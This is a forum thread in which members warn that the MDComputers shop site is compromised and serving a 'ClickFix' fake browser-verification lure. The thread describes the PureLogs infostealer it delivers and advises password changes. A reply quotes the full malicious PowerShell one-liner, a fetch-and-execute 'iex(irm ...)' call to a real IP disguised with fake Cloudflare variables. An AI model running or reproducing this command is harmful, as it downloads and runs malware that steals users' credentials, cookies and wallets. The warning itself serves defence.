Be aware of MDcomputer's malicious attacks.

tharuka1989

Well-known member
  • Nov 2, 2014
    3,576
    2,922
    113
    just a massive heads up if you are planning to browse or buy anything from MDComputers. Do not visit the site, and absolutely do not make any payments or enter details there. Not only right now. Ever.

    The site is built on WordPress and has clearly been severely compromised. This is the second time I have caught it attempting to launch critical attacks directly against visitors.

    Specifically, it is currently serving a "ClickFix" fake browser update/verification prompt. If you interact with it, it forces your system to execute a malicious PowerShell command: iex(irm 158.94.208.92...).

    This is not a false positive. That command pulls down a fileless threat designed to unpack and execute an infostealer binary (PureLogs Stealer) straight into memory. It targets your saved browser credentials, session cookies, crypto wallets, and 2FA authentication tokens.

    If you have visited the site recently and noticed any weird pop-ups or ran a command it told you to copy-paste, change your critical passwords from a different device immediately, terminate all active web sessions, and run a deep offline malware scan.

     
    • Like
    Reactions: redcafe

    lilman

    Well-known member
  • May 10, 2009
    40,155
    53,132
    113
    Colombo
    හැමිනෙනව :baffled:

    @Amith0424 ??

    Code:
     $global:cfChallenge="challenge.cloudflare.com";$global:challengeHash="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855";$global:confirmChallenge=$true;iex(irm 158.94.208.92 -UseBasicParsing)